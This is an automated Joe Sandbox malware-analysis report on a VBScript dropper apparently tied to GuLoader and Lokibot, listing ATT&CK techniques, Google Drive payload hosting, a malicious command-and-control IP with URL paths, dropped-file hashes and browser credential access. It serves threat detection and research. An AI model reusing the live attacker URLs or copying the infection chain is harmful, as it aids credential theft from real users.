                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match File source: dump.pcap, type: PCAP
                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

                Remote Access Functionality

                Source: Yara match File source: dump.pcap, type: PCAP
                | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                | Gather Victim Identity Information | 221 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 221 Scripting | 111 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                | Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                | Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                | Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction |
                | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                Behavior Graph ID: 1522525, Sample: Bnnebgers.vbs, Startdate: 30/09/2024, Architecture: WINDOWS, Score: 100
                • Sample: DNS/IP drive.usercontent.google.com, drive.google.com. Signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); 6 other signatures. Started: wscript.exe, powershell.exe.
                • wscript.exe: Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures. Started: powershell.exe.
                • powershell.exe (started by wscript.exe): DNS/IP drive.usercontent.google.com 142.250.184.193 (GOOGLEUS, United States), drive.google.com 142.250.185.206 (GOOGLEUS, United States). Signature: Found suspicious powershell code related to unpacking or dynamic code loading. Started: conhost.exe.
                • powershell.exe (started from the sample): Signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading. Started: msiexec.exe, conhost.exe.
                • msiexec.exe: DNS/IP 137.184.191.215 (PANDGUS, United States). Dropped: C:\Users\user\AppData\Roaming\...\31437F.exe, PE32. Signature: Tries to harvest and steal browser information (history, passwords, etc).

                | Source | Detection | Scanner | Label |
                |---|---|---|---|
                | Bnnebgers.vbs | 5% | Virustotal | |
                | Bnnebgers.vbs | 3% | ReversingLabs | |

                | Source | Detection | Scanner | Label |
                |---|---|---|---|
                | C:\Users\user\AppData\Roaming\188E93\31437F.exe | 0% | Virustotal | |
                | C:\Users\user\AppData\Roaming\188E93\31437F.exe | 0% | ReversingLabs | |

                No Antivirus matches

                | Source | Detection | Scanner | Label |
                |---|---|---|---|
                | drive.google.com | 0% | Virustotal | |
                | drive.usercontent.google.com | 1% | Virustotal | |

                | Source | Detection | Scanner | Label |
                |---|---|---|---|
                | http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
                | http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
                | https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
                | https://go.micro | 0% | URL Reputation | safe |
                | https://contoso.com/ | 0% | URL Reputation | safe |
                | https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
                | https://contoso.com/License | 0% | URL Reputation | safe |
                | https://contoso.com/Icon | 0% | URL Reputation | safe |
                | https://aka.ms/pscore68 | 0% | URL Reputation | safe |
                | https://apis.google.com | 0% | URL Reputation | safe |
                | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                | http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal | |
                | https://drive.google.com | 0% | Virustotal | |
                | https://www.google.com | 0% | Virustotal | |
                | https://drive.usercontent.google.com | 1% | Virustotal | |
                | http://drive.usercontent.google.com | 1% | Virustotal | |
                | https://github.com/Pester/Pester | 1% | Virustotal | |
                | http://137.184.191.215/index.php/039 | 14% | Virustotal | |
                | http://drive.google.com | 0% | Virustotal | |
                | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                |---|---|---|---|---|---|
                | drive.google.com | 142.250.185.206 | true | false | | unknown |
                | drive.usercontent.google.com | 142.250.184.193 | true | false | | unknown |

                | Name | Malicious | Antivirus Detection | Reputation |
                |---|---|---|---|
                | http://137.184.191.215/index.php/039 | true | | unknown |
                | Name | Source | Malicious | Antivirus Detection | Reputation |
                |---|---|---|---|---|
                | https://www.google.com | powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
                | http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1879470181.000001CA5698E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
                | http://drive.usercontent.google.com | powershell.exe, 00000001.00000002.1845270492.000001CA485B4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
                | http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.2683653620.0000000004F98000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
                | https://aka.ms/pscore6lB | powershell.exe, 00000003.00000002.2683653620.0000000004E41000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
                | http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.2683653620.0000000004F98000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
                | https://go.micro | powershell.exe, 00000001.00000002.1845270492.000001CA47507000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
                | https://contoso.com/ | powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
                | https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1879470181.000001CA5698E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
                | https://contoso.com/License | powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
                | https://contoso.com/Icon | powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
                | https://drive.googP | powershell.exe, 00000001.00000002.1845270492.000001CA48576000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
                | https://drive.google.com | powershell.exe, 00000001.00000002.1845270492.000001CA46B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA484CB000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
                | https://drive.usercontent.googh | powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
                | https://drive.usercontent.google.com | powershell.exe, 00000001.00000002.1845270492.000001CA46DB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
                | https://drive.usercontent.google.com/pb | msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
                | http://drive.google.com | powershell.exe, 00000001.00000002.1845270492.000001CA4857B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
                | https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1845270492.000001CA46921000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
                | https://apis.google.com | powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
                | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1845270492.000001CA46921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2683653620.0000000004E41000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
                | https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.2683653620.0000000004F98000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
                | https://drive.usercontent.google.com/Db | msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
                        | IP | Domain | Country | ASN | ASN Name | Malicious |
                        |---|---|---|---|---|---|
                        | 142.250.185.206 | drive.google.com | United States | 15169 | GOOGLEUS | false |
                        | 142.250.184.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false |
                        | 137.184.191.215 | unknown | United States | 11003 | PANDGUS | true |
                        Joe Sandbox version: 41.0.0 Charoite
                        Analysis ID: 1522525
                        Start date and time: 2024-09-30 10:01:53 +02:00
                        Joe Sandbox product: CloudBasic
                        Overall analysis duration: 0h 7m 0s
                        Hypervisor based Inspection enabled: false
                        Report type: full
                        Cookbook file name: default.jbs
                        Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed: 10
                        Number of new started drivers analysed: 0
                        Number of existing processes analysed: 0
                        Number of existing drivers analysed: 0
                        Number of injected processes analysed: 0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode: default
                        Analysis stop reason: Timeout
                        Sample name: Bnnebgers.vbs
                        Detection: MAL
                        Classification: mal100.troj.spyw.expl.evad.winVBS@8/10@2/3
                        EGA Information: Failed
                        HCA Information:
                        • Successful, ratio: 83%
                        • Number of executed functions: 67
                        • Number of non-executed functions: 19
                        Cookbook Comments:
                        • Found application associated with file extension: .vbs
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target msiexec.exe, PID 416 because there are no executed function
                        • Execution Graph export aborted for target powershell.exe, PID 4348 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 6648 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        | Time | Type | Description |
                        |---|---|---|
                        | 04:02:48 | API Interceptor | 86x Sleep call for process: powershell.exe modified |
                        | 04:03:45 | API Interceptor | 26x Sleep call for process: msiexec.exe modified |
                        | Match | Associated Sample Name / URL | Detection | Threat Name | Context |
                        |---|---|---|---|---|
                        | 137.184.191.215 | PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbe | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/check.php?s=am9ntjjw |
                        | | Happy Fiestas Patrias#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/check.php?s=am9ntjjw |
                        | | B#U00dcDC#U018f SOR#U011eU 09-24-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/10899 |
                        | | ____.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/039 |
                        | | DIR-A_FB09948533#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/10899 |
                        | | INVITACI#U00d3N A COTIZAR Nueva cervecer#U00eda NUEVA CERVECER#U00cdA.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/check.php?s=am9ntjjw |
                        | | #U017d#U00c1DOST O ROZPO#U010cET 09-23-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/check?post=073989953 |
                        | | U00b7pdf.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/10899 |
                        | | po.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/wp.php?view=1 |
                        | | WNIOSEK BUD#U017bETOWY 09-18-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/check?post=073989953 |
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        PANDGUSSecuriteInfo.com.Linux.Siggen.9999.10361.13333.elfGet hashmaliciousMiraiBrowse
                        • 155.120.253.229
                        PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbeGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215
                        Happy Fiestas Patrias#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215
                        B#U00dcDC#U018f SOR#U011eU 09-24-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215
                        ____.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215
                        DIR-A_FB09948533#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215
                        https://forms.office.com/Pages/ShareFormPage.aspx?id=atlxJ-ZfTkmpiBz5GOrQZra6YH8IF9tJvDnK9FEosBRUNUoySTNMSlhENTkyTjRFS0pYUFBWREJDVS4u&sharetoken=VjI7W44Fh45blPkj2SeDGet hashmaliciousHTMLPhisherBrowse
                        • 137.184.252.128
                        INVITACI#U00d3N A COTIZAR Nueva cervecer#U00eda NUEVA CERVECER#U00cdA.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215
                        #U017d#U00c1DOST O ROZPO#U010cET 09-23-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215
                        U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        3b5074b1b5d032e5620f69f9f700ff0eQT2Q1292300924.vbsGet hashmaliciousFormBookBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        NTS_eTaxInvoice.html.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        RFQ-5120240930 VENETA PESCA SRL.vbsGet hashmaliciousVIP KeyloggerBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        Faktura_82666410_1361590461#U00b7pdf.vbeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbsGet hashmaliciousGuLoaderBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        Urgent Quotation Notification_pdf.vbsGet hashmaliciousUnknownBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        http://hrlaw.com.auGet hashmaliciousUnknownBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        file.exeGet hashmaliciousUnknownBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        file.exeGet hashmaliciousUnknownBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        CAPE MARS VSL'S PARTICULARS.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        37f463bf4616ecd445d4a1937da06e19NTS_eTaxInvoice.html.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        Faktura_82666410_1361590461#U00b7pdf.vbeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        SecuriteInfo.com.Win32.BackdoorX-gen.13984.32209.exeGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        file.exeGet hashmaliciousClipboard Hijacker, VidarBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        file.exeGet hashmaliciousLummaC, VidarBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        file.exeGet hashmaliciousLummaC, VidarBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        Match | Associated Sample Name / URL | Detection | Threat Name
                        C:\Users\user\AppData\Roaming\188E93\31437F.exe | C7jdH7geD6.exe | malicious | Unknown
                        C:\Users\user\AppData\Roaming\188E93\31437F.exe | setup.exe | malicious | Unknown
                        C:\Users\user\AppData\Roaming\188E93\31437F.exe | #U67e5#U8be2#U5165#U53e3.exe | malicious | Unknown
                        C:\Users\user\AppData\Roaming\188E93\31437F.exe | sample.exe | malicious | Unknown
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:modified
                                Size (bytes):8003
                                Entropy (8bit):4.840877972214509
                                Encrypted:false
                                SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                MD5:106D01F562D751E62B702803895E93E0
                                SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:Nlllultnxj:NllU
                                MD5:F93358E626551B46E6ED5A0A9D29BD51
                                SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:@...e................................................@..........
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\SysWOW64\msiexec.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):59904
                                Entropy (8bit):5.770776695007155
                                Encrypted:false
                                SSDEEP:768:uo8HL2TB4LHLbo77Q2d9xSDvYD07BOUp8VKfTKznHVXq6ayYf3:vTB4LG7B8jY4XprIHw62
                                MD5:9D09DC1EDA745A5F87553048E57620CF
                                SHA1:1D0C7CFCA8104D06DE1F08B97F28B3520C246CD7
                                SHA-256:3A90EDE157D40A4DB7859158C826F7B4D0F19A5768F6483C9BE6EE481C6E1AF7
                                SHA-512:2BE940F0468F77792C6E1B593376900C24FF0B0FAE8DC2E57B05596506789AA76119F8BE780C57252F74CD1F0C2FA7223FE44AE4FA3643C26DF00DD42BD4C016
                                Malicious:false
                                Antivirus:
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: C7jdH7geD6.exe, Detection: malicious, Browse
                                • Filename: setup.exe, Detection: malicious, Browse
                                • Filename: #U67e5#U8be2#U5165#U53e3.exe, Detection: malicious, Browse
                                • Filename: sample.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...tkq.tkq.tkq.`.r.skq.`.t.zkq.`.p.ykq.tkp..kq.`.x.wkq.`.u.=kq.`...ukq.`.s.ukq.Richtkq.........PE..L....E.%.....................^......0.............@.......................... ......\.....@...... ...................................................................(..T...............................@.......................@....................text...d........................... ..`.data...............................@....idata..............................@..@.didat..L...........................@....rsrc............ ..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\msiexec.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:dropped
                                Size (bytes):459596
                                Entropy (8bit):5.95668350371162
                                Encrypted:false
                                SSDEEP:6144:98vVaAaU50vqHcGEvkb8hleJTPnTHe1cYyca58G2D04eK4SH3Tl6qSFLqmc+9Hg:9T+0CHcGLbYWvKcrBI04N4SX56nE
                                MD5:FDB92DF6A107CB2E9CBF0556FB7D9583
                                SHA1:FB1D9D5B30862F5EAF7E14B9FF9697D96500C71D
                                SHA-256:0B63D26CB8E521B1E3264B3F0A208A94A32B027738DD94722562332F55A321DD
                                SHA-512:2B22B4BB6E84E69FD7C0A7EDCEFC11761538F42A35F65B83BE1DE99FC932BA15D3E81D42471973B1AD0CA7B122E71E1F955CB8404BADD269ADCA7FCE679275EF
                                Malicious:false
                                Process:C:\Windows\SysWOW64\msiexec.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):46
                                Entropy (8bit):1.0424600748477153
                                Encrypted:false
                                SSDEEP:3:/lbq:4
                                MD5:8CB7B7F28464C3FCBAE8A10C46204572
                                SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                                SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                                SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                                Malicious:false
                                Preview:........................................user.
                                File type:ASCII text, with CRLF line terminators
                                Entropy (8bit):4.914061606287888
                                TrID:
                                • Visual Basic Script (13500/0) 100.00%
                                File name:Bnnebgers.vbs
                                File size:71'756 bytes
                                MD5:5b6ded9dd4c8b33c96ec2dfccc4185ba
                                SHA1:baf00d33cc29a38cedd43d1b483a24e5af5ef707
                                SHA256:b39688815505416bd3ce779da8714b4eb492dea27036998ad90ddc439b8d554f
                                SHA512:aeb3c167595408bb06a89a18c48fa4f097c5f4ad22b1fe0a8ddbb120d7b4b57939789a5b5427fdb3fe781c0bed78589bc618b724c0a73345aa502eb93c611b57
                                SSDEEP:1536:susq1DWeDHqjpgA5JePv0wXvLr+s3NyQr0AyG1XLatJkYf:susq1qeZAHeP2s3BYU1Xqf
